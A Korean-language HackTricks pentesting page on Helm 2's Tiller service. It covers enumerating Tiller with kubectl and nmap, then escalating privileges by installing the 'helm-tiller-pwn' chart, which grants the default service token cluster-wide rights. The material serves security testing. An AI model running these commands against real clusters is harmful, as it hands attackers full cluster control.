Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

๊ธฐ๋ณธ ์ •๋ณด

Helm์€ Kubernetes์˜ ํŒจํ‚ค์ง€ ๊ด€๋ฆฌ์ž์ž…๋‹ˆ๋‹ค. YAML ํŒŒ์ผ์„ ํŒจํ‚ค์ง•ํ•˜๊ณ  ์ด๋ฅผ ๊ณต์šฉ ๋ฐ ๊ฐœ์ธ ์ €์žฅ์†Œ์— ๋ฐฐํฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ํŒจํ‚ค์ง€๋ฅผ Helm Charts๋ผ๊ณ  ํ•ฉ๋‹ˆ๋‹ค. Tiller๋Š” ๊ธฐ๋ณธ์ ์œผ๋กœ ํฌํŠธ 44134์—์„œ ์„œ๋น„์Šค๋ฅผ ์ œ๊ณตํ•˜๋Š” ์„œ๋น„์Šค์ž…๋‹ˆ๋‹ค.

๊ธฐ๋ณธ ํฌํŠธ: 44134

PORT      STATE SERVICE VERSION
44134/tcp open  unknown

์—ด๊ฑฐ

๋‹ค๋ฅธ ๋„ค์ž„์ŠคํŽ˜์ด์Šค์˜ pods ๋ฐ/๋˜๋Š” ์„œ๋น„์Šค๋ฅผ ์—ด๊ฑฐํ•  ์ˆ˜ ์žˆ๋‹ค๋ฉด, ์ด๋ฅผ ์—ด๊ฑฐํ•˜๊ณ  ์ด๋ฆ„์— โ€œtillerโ€œ๊ฐ€ ํฌํ•จ๋œ ๊ฒƒ์„ ๊ฒ€์ƒ‰ํ•˜์‹ญ์‹œ์˜ค:

kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"

์˜ˆ์‹œ:

kubectl get pods -n kube-system
NAME                                       READY   STATUS             RESTARTS   AGE
kube-scheduler-controlplane                1/1     Running            0          35m
tiller-deploy-56b574c76d-l265z             1/1     Running            0          35m

kubectl get services -n kube-system
NAME            TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)                  AGE
kube-dns        ClusterIP   10.96.0.10     <none>        53/UDP,53/TCP,9153/TCP   35m
tiller-deploy   ClusterIP   10.98.57.159   <none>        44134/TCP                35m

์ด ์„œ๋น„์Šค๋ฅผ ์ฐพ์œผ๋ ค๋ฉด ํฌํŠธ 44134๋ฅผ ํ™•์ธํ•ด ๋ณด์„ธ์š”:

sudo nmap -sS -p 44134 <IP>

ํ•œ ๋ฒˆ ๋ฐœ๊ฒฌํ•˜๋ฉด ํด๋ผ์ด์–ธํŠธ ํ—ฌ๋ฆ„ ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์„ ๋‹ค์šด๋กœ๋“œํ•˜์—ฌ ํ†ต์‹ ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. homebrew์™€ ๊ฐ™์€ ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜๊ฑฐ๋‚˜ ๊ณต์‹ ๋ฆด๋ฆฌ์Šค ํŽ˜์ด์ง€๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋” ๋งŽ์€ ์„ธ๋ถ€์ •๋ณด๋‚˜ ๋‹ค๋ฅธ ์˜ต์…˜์€ ์„ค์น˜ ๊ฐ€์ด๋“œ๋ฅผ ์ฐธ์กฐํ•˜์„ธ์š”.

๊ทธ๋Ÿฐ ๋‹ค์Œ ์„œ๋น„์Šค๋ฅผ ์—ด๊ฑฐํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

helm --host tiller-deploy.kube-system:44134 version

๊ถŒํ•œ ์ƒ์Šน

๊ธฐ๋ณธ์ ์œผ๋กœ Helm2๋Š” kube-system ๋„ค์ž„์ŠคํŽ˜์ด์Šค์— ๋†’์€ ๊ถŒํ•œ์œผ๋กœ ์„ค์น˜๋˜์—ˆ์œผ๋ฏ€๋กœ, ์„œ๋น„์Šค๋ฅผ ์ฐพ๊ณ  ์ด์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ๋‹ค๋ฉด ๊ถŒํ•œ์„ ์ƒ์Šน์‹œํ‚ฌ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋‹น์‹ ์ด ํ•ด์•ผ ํ•  ์ผ์€ ๋‹ค์Œ๊ณผ ๊ฐ™์€ ํŒจํ‚ค์ง€๋ฅผ ์„ค์น˜ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค: https://github.com/Ruil1n/helm-tiller-pwn ์ด๋Š” ๊ธฐ๋ณธ ์„œ๋น„์Šค ํ† ํฐ์ด ์ „์ฒด ํด๋Ÿฌ์Šคํ„ฐ์˜ ๋ชจ๋“  ๊ฒƒ์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ๋„๋ก ํ•ด์ค๋‹ˆ๋‹ค.

git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart

http://rui0.cn/archives/1573์—์„œ ๊ณต๊ฒฉ์— ๋Œ€ํ•œ ์„ค๋ช…์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ์ง€๋งŒ, ๊ธฐ๋ณธ์ ์œผ๋กœ helm-tiller-pwn/pwnchart/templates/ ๋‚ด์˜ clusterrole.yaml ๋ฐ clusterrolebinding.yaml ํŒŒ์ผ์„ ์ฝ์–ด๋ณด๋ฉด ๋ชจ๋“  ๊ถŒํ•œ์ด ๊ธฐ๋ณธ ํ† ํฐ์— ๋ถ€์—ฌ๋˜๋Š” ๋ฐฉ์‹์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ